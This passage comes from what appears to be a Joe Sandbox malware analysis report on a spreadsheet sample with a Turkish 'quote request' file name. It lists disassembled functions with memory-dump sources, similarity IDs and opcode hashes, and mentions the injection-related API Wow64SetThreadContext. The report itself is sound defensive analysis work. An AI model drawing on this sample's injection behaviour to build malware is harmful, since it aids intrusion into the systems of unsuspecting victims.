                                                  • Opcode Fuzzy Hash: 098423763b03a37857b5bf60f7fac5fd00505bbc03a9317100ad390cb2b9eb83
                                                  • Instruction Fuzzy Hash: 5341BDB5D012589FCB10CFA9D985AEEFBF1BF49310F14806AE419B7240D738A945CFA4
                                                  Function 05B15AB0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B15B5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: e4ef7f9458d7e69b37c730b68e9ac39b53c2ca0dc2fba8aadf60df060753b933
                                                  • Instruction ID: 58ce50b84e52d9468e95e394e6f435c205e2bad1056c23e9017617c59bfa8e44
                                                  • Opcode Fuzzy Hash: e4ef7f9458d7e69b37c730b68e9ac39b53c2ca0dc2fba8aadf60df060753b933
                                                  • Instruction Fuzzy Hash: 1D31BEB4D012589FCB10CFA9D584AEEFBF1BF49310F14806AE419B7240D738A945CF94
                                                  Function 05AE3CD0 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  • Opcode ID: bbb2c3f069d910bcf1083e53f013082f4079d5a1e186d12942380e4756beaa35
                                                  • Instruction ID: 519a4fc086a262e47bfac61fced0c9d775e059fe61b31fc48e78c166d73107c6
                                                  • Opcode Fuzzy Hash: bbb2c3f069d910bcf1083e53f013082f4079d5a1e186d12942380e4756beaa35
                                                  • Instruction Fuzzy Hash: 71A174313042409FCB159F68D954E6A7BB2FF89710F1585AAE50A8F3B2CB35EC42DB51
                                                  Function 05AE8438 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  • Opcode ID: 60323a0da16c87c7e305821afc1a79797147024bbe8fd5a07d233f15e10579ce
                                                  • Instruction ID: 284e03ae5ea46b0b0a18574a8e94aced38c6f915f325dab24e22bde675288224
                                                  • Opcode Fuzzy Hash: 60323a0da16c87c7e305821afc1a79797147024bbe8fd5a07d233f15e10579ce
                                                  • Instruction Fuzzy Hash: CC717B71F0060A8FCB14DFA9D590AAFBBF6FF89310F248569D519A7244DB34E9028B51
                                                  Function 05AE5C58 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  • Opcode ID: a6128213963aac1fff5fc2aeb1aeea3659f43c5307697bf1933adf7a7849598f
                                                  • Instruction ID: b5ae58714a6cc8f81f5bc3a5d866946bc01e7c76a01004d32e04f41eb6d7aab1
                                                  • Opcode Fuzzy Hash: a6128213963aac1fff5fc2aeb1aeea3659f43c5307697bf1933adf7a7849598f
                                                  • Instruction Fuzzy Hash: 64715734B006148FCB14EB68D5A8AAEB7B6FF8C704F508569D4069B3A4DF74ED46CB90
                                                  Function 03111B9A Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 0c55a62e23575217cf29d7036421ed6e8bdbf05a61cd16dd3bdd372ab9bb30eb
                                                  • Instruction ID: 9731d1fa34ee3da0ef6e72681ba7424333dc066a4ffcb1b848fedd5fba69278c
                                                  • Opcode Fuzzy Hash: 0c55a62e23575217cf29d7036421ed6e8bdbf05a61cd16dd3bdd372ab9bb30eb
                                                  • Instruction Fuzzy Hash: 2E7108B4D0421ADFDF14CFA5D8447EEBBF0BB48304F15926AC106EB290E7791595CB29
                                                  Function 05ADB128 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  • Opcode ID: b5d29666701c876702173e55a459ea12a6055e520c5dc5c59a3e81df2183e8cd
                                                  • Instruction ID: cea5cf34b32a506d3710d528a870a0ffe5e56fa939a54b2f0028bd01b05d1c01
                                                  • Opcode Fuzzy Hash: b5d29666701c876702173e55a459ea12a6055e520c5dc5c59a3e81df2183e8cd
                                                  • Instruction Fuzzy Hash: 9451E636A0421A9FCB01EF59C444EAAFBB2FF46320B568556E5169B252D730EC46CFF0
                                                  Function 03111F3C Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: cb9a139bdb927c47d900832a896dc0e53e64d9837dc74863708089da2446b376
                                                  • Instruction ID: 5e030b10b33195c2a45c31514d5dcdf809e4c6e0c31edf92d46d2e4271b1a411
                                                  • Opcode Fuzzy Hash: cb9a139bdb927c47d900832a896dc0e53e64d9837dc74863708089da2446b376
                                                  • Instruction Fuzzy Hash: 7971F6B490021ADFDF14CFA5D8847EEBBF1FB48304F155239C106AB290EBB95995CB19
                                                  Function 03111BDE Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: a296b7dd7a462342c21124a544ad6064de30c7ce18f4436ea104cac549ab4b26
                                                  • Instruction ID: 103083ce7a8527762d8a05c428580f35507dee5f2d42a89a3797d32aa81c6148
                                                  • Opcode Fuzzy Hash: a296b7dd7a462342c21124a544ad6064de30c7ce18f4436ea104cac549ab4b26
                                                  • Instruction Fuzzy Hash: BA61F4B490021ADFEF14CFA5D8847EEBBF1BB48304F159229C106EA290EB795595CB29
                                                  Function 03111E87 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: a0d75a4415ea47dc61719de6924a8c69b5031b9005be43a9e3584082f797670a
                                                  • Instruction ID: ba39c1e8f8f15fb3b57126e34302167bc0dca979cb760d6b8230f1bc371c2c23
                                                  • Opcode Fuzzy Hash: a0d75a4415ea47dc61719de6924a8c69b5031b9005be43a9e3584082f797670a
                                                  • Instruction Fuzzy Hash: BD61E6B490021ADFEF14CFA5D8847EEFBF1BB48304F159239C106EA290EB795595CB29
                                                  Function 05ADA160 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: paq
                                                  • API String ID: 0-3273118895
                                                  • Opcode ID: f32a60a9724faa20e5a68ffbcd7d24f24d7a0e5ec7dd5c160f3c05f28946d31f
                                                  • Instruction ID: 3de36209b57b2c0a4ddd5d99a358e1d3a570cf881c3eb808aa3ab5a2276145a7
                                                  • Opcode Fuzzy Hash: f32a60a9724faa20e5a68ffbcd7d24f24d7a0e5ec7dd5c160f3c05f28946d31f
                                                  • Instruction Fuzzy Hash: F8518F76640100AFCB459FA9C904D2ABBF7FF8C31471580D8E20A8B276CA36DC22EB50
                                                  Function 03111DA1 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: d05f5ff608cf065afb80062a814dd9b8ac7f4c3ff2d1f776f8b90b2c0dc259c2
                                                  • Instruction ID: 3955d4032c95211b81969f4fa073b5afb3347de99b6ddd892b76bb296695fe1c
                                                  • Opcode Fuzzy Hash: d05f5ff608cf065afb80062a814dd9b8ac7f4c3ff2d1f776f8b90b2c0dc259c2
                                                  • Instruction Fuzzy Hash: 0D61E6B490021ADFDF14CFA5D8847EEBBF0BB4C304F159229D106EA290EB795595CB29
                                                  Function 03111C37 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 372370529b1e6720e2025a9f63b575f3c0050624e2c3f1e15de28c540f8f4490
                                                  • Instruction ID: e3a7b08106bd1becc20b2292c497109c4594cd29bdd09f0ec3d3a0680d807650
                                                  • Opcode Fuzzy Hash: 372370529b1e6720e2025a9f63b575f3c0050624e2c3f1e15de28c540f8f4490
                                                  • Instruction Fuzzy Hash: 916106B490021ADFEF14CFA5D8847EEFBF0BB48304F159239C106EA290EB795595CB29
                                                  Function 03111C83 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: b6aaade253db6d2250260ecdd71d4295ac5d6006834bba517431d5bdfb061586
                                                  • Instruction ID: 9a3211559f4d0a6340f3af60aafe7dc65aebc68ed0bd0d52bb0b11064e91e09a
                                                  • Opcode Fuzzy Hash: b6aaade253db6d2250260ecdd71d4295ac5d6006834bba517431d5bdfb061586
                                                  • Instruction Fuzzy Hash: 5961E6B490021ADFEF14CFA5D8847EEFBF0BB48304F159239C106EA290EB795595CB29
                                                  Function 05AEDCA4 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4|bq
                                                  • API String ID: 0-1932486993
                                                  • Opcode ID: 70cda697e844a81b15a9a693f298abc55e14c73a4054474f6e79c67b1807f098
                                                  • Instruction ID: 671067f97311d5a3416bd77288bd3834735558bf534fffd54911924aeaf4df2b
                                                  • Opcode Fuzzy Hash: 70cda697e844a81b15a9a693f298abc55e14c73a4054474f6e79c67b1807f098
                                                  • Instruction Fuzzy Hash: 2771A5B4E012288FEB64CF69C995BA9BBB2BB89304F4080E9D54DA7341DB345E85CF51
                                                  Function 05AE2E08 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: 054dea644cc2808d73da7744992c0c083e728e25bf9063c354878da8a82028cc
                                                  • Instruction ID: 44f7a40b41205ff983e4bd815c72b45d0064cc65802232d3be24cdba0d063fe0
                                                  • Opcode Fuzzy Hash: 054dea644cc2808d73da7744992c0c083e728e25bf9063c354878da8a82028cc
                                                  • Instruction Fuzzy Hash: A1415134B106148FCB18AB68C498A6E77BBEFCD700F50451DE406AB7A4CF749D46DB91
                                                  Function 057E2288 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TJbq
                                                  • API String ID: 0-1760495472
                                                  • Opcode ID: 44b10811e94ffc0607b2923ed028d3c2c032564f8b2126040b3a3090864467b7
                                                  • Instruction ID: 56541ee1984e437a87a733c73e971ead76e56f90f42561c530ffe94a8843704b
                                                  • Opcode Fuzzy Hash: 44b10811e94ffc0607b2923ed028d3c2c032564f8b2126040b3a3090864467b7
                                                  • Instruction Fuzzy Hash: 4F51D178E10208DFDB04DFA9E888AADBBF6FF89300F10806AD416A7365DB749945DF10
                                                  Function 057E2298 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TJbq
                                                  • API String ID: 0-1760495472
                                                  • Opcode ID: 018ad30dc29e302a1f14b1f0bb8d3a6bc8348414bda5a09a3246c126785f5209
                                                  • Instruction ID: 0df9a623bac75eb20e06ce06b78025f719101efb714a975f575d6f608d33b513
                                                  • Opcode Fuzzy Hash: 018ad30dc29e302a1f14b1f0bb8d3a6bc8348414bda5a09a3246c126785f5209
                                                  • Instruction Fuzzy Hash: 9F51CF78E00208DFDB04DFA9E488AADBBBAFF4D300F108069E416A7365DB749941DF50
                                                  Function 05AD8260 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: l
                                                  • API String ID: 0-2517025534
                                                  • Opcode ID: 7cb870b776d24b4694d9d979b9f1bbfe101899a04506492fa8e36bdaa8adc401
                                                  • Instruction ID: e2ce6760105ea625331cb68311a109246afcbe45d7e71eca5fdacb67040178fd
                                                  • Opcode Fuzzy Hash: 7cb870b776d24b4694d9d979b9f1bbfe101899a04506492fa8e36bdaa8adc401
                                                  • Instruction Fuzzy Hash: 5A41E170E096498FDB01EFAAD854AEEBFF2FF89300F008066D426A7255D7385945CFA5
                                                  Function 05AEDC37 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4|bq
                                                  • API String ID: 0-1932486993
                                                  • Opcode ID: f3e333bd701e47fc76b9d943546ea6d7645c40a926b35cb4d60c0a6f8aa5a1fc
                                                  • Instruction ID: 7e3f4aa7a549f4ddf10d00b7a682c21ded84a874385f50846f2e270078c51a22
                                                  • Opcode Fuzzy Hash: f3e333bd701e47fc76b9d943546ea6d7645c40a926b35cb4d60c0a6f8aa5a1fc
                                                  • Instruction Fuzzy Hash: C851D4B4E06228CFDB64CF29C884BA9BBB6FB4A304F4090E9D54DA7241DB345E85CF51
                                                  Function 05E02B26 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8
                                                  • API String ID: 0-4194326291
                                                  • Opcode ID: 94dc07e3ab968afa6a7647d06cd25ed7abee4ba852d1d4d6f9b3cb1928fbcd4c
                                                  • Instruction ID: c9be1b77c48510ca3bcbfdf49670a964eb4dcfccc6b2d23d4d341c08a6cdc29b
                                                  • Opcode Fuzzy Hash: 94dc07e3ab968afa6a7647d06cd25ed7abee4ba852d1d4d6f9b3cb1928fbcd4c
                                                  • Instruction Fuzzy Hash: 9251D374905219CEDBA4CF59C888BE9B7F2BB49314F54A0E6D14DB3280D7745AC4CF15
                                                  Function 057EEDF1 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: 5864f408deb6347ea1b8ded33cd636a08455c20b37c570c07ae26a9c483c7c3c
                                                  • Instruction ID: 25fb2156f5c08c06916e7d46a3445711a7f9b206c669a201522cf79fe2042b7a
                                                  • Opcode Fuzzy Hash: 5864f408deb6347ea1b8ded33cd636a08455c20b37c570c07ae26a9c483c7c3c
                                                  • Instruction Fuzzy Hash: EB31B6357042049FCF14CFA4D988D697BB6FF8C310B054569E9099B375CA31DC02EBA0
                                                  Function 05AE2DF7 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: 2070185c5798f77726d354a27551d8570e138f408358f7c055cec7ca52c87e72
                                                  • Instruction ID: 4ffc2f85ab94ab0263e52320bd1a6c72640f1e6afcf1416cb22145ff91a46c2c
                                                  • Opcode Fuzzy Hash: 2070185c5798f77726d354a27551d8570e138f408358f7c055cec7ca52c87e72
                                                  • Instruction Fuzzy Hash: BB319530B102145BCB19AB69D898A7EBBBBEFD9700F50442EE016DB3A4CF759C06D791
                                                  Function 05ADECF0 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p<]q
                                                  • API String ID: 0-1327301063
                                                  • Opcode ID: 27dc9788cfd3a1c325b35b84377828ab4737be9cdeccbdc5854ae6991eb65377
                                                  • Instruction ID: 17b98eef4994480f46dddf93e966a655a872bc18dc63f7c980ac31dd1dd8960f
                                                  • Opcode Fuzzy Hash: 27dc9788cfd3a1c325b35b84377828ab4737be9cdeccbdc5854ae6991eb65377
                                                  • Instruction Fuzzy Hash: 7B2180713081549FCB05DF29C844EAA7BE9BF8A200B184496F896CB361DA71DC51CB30
                                                  Function 05E23022 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [
                                                  • API String ID: 0-784033777
                                                  • Opcode ID: cd08b364d70ba9e7975539dc94c64e23c5a6684c4ce013d2f2d4263e5db7d625
                                                  • Instruction ID: ad364bfe6e41dd7621c899271b19a5e3b3d753edf50bb4e171727a21c3ef82c7
                                                  • Opcode Fuzzy Hash: cd08b364d70ba9e7975539dc94c64e23c5a6684c4ce013d2f2d4263e5db7d625
                                                  • Instruction Fuzzy Hash: 0631CB78A062288FDB60CF18D9889D9B7F1FF0A304F5085D6E819A7755D7349E80CF02
                                                  Function 05AD7974 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: a4fe269903e40372da259f6565682dfe6582d25c23760946579c9d4473ae5b2e
                                                  • Instruction ID: dc2ebc55b707490fe3273e43a3ea1629b266115a5a67fd89e8850a74899ca0cf
                                                  • Opcode Fuzzy Hash: a4fe269903e40372da259f6565682dfe6582d25c23760946579c9d4473ae5b2e
                                                  • Instruction Fuzzy Hash: 8121F6749022188FEB54DF69D884B9DBBF2FB49314F5042A9E00AA7394DB345EC5CF20
                                                  Function 03111AE0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq
                                                  • API String ID: 0-538729646
                                                  • Opcode ID: 15a015dc524695b952b3f15b415240561493cbfba7504350a1e9c97b58af8214
                                                  • Instruction ID: fcce4ace4ae6f04618d51283154171005b47b0d7d37eb31b27d01773cb758676
                                                  • Opcode Fuzzy Hash: 15a015dc524695b952b3f15b415240561493cbfba7504350a1e9c97b58af8214
                                                  • Instruction Fuzzy Hash: 1D01C874302141AFD315DB6DE884B9ABBF6EFC9311F1580B5D10ACB2A4DB798C858B11
                                                  Function 05E25ACD Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: q
                                                  • API String ID: 0-4110462503
                                                  • Opcode ID: 9e2166e18c1fe5f4f92f50adb1577d6229f6c1f838bba9743aa8464db4bf12ee
                                                  • Instruction ID: 501c6b526f83492b33c393cf957e23a50f8ebdc7b6923e6ec720d8f026f6a629
                                                  • Opcode Fuzzy Hash: 9e2166e18c1fe5f4f92f50adb1577d6229f6c1f838bba9743aa8464db4bf12ee
                                                  • Instruction Fuzzy Hash: 8A21B374911229CFEB64CF19C888BE8B7B2BB49305F1191EAD45DA7684DB749E84CF01
                                                  Function 03111AF0 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq
                                                  • API String ID: 0-538729646
                                                  • Opcode ID: 178739d50bab0e799f62d63927867655614518a65a716ccf2dd5c87cc3adfb67
                                                  • Instruction ID: f12546a5a7a0c1e7f3fa03789b9262bfaecf7eb5a760a3deeb0b23a2da267508
                                                  • Opcode Fuzzy Hash: 178739d50bab0e799f62d63927867655614518a65a716ccf2dd5c87cc3adfb67
                                                  • Instruction Fuzzy Hash: 3B01A774302100AFD344DA6EE894B9ABBFAEBCC311F158075E20E872A8DB74DC858B51
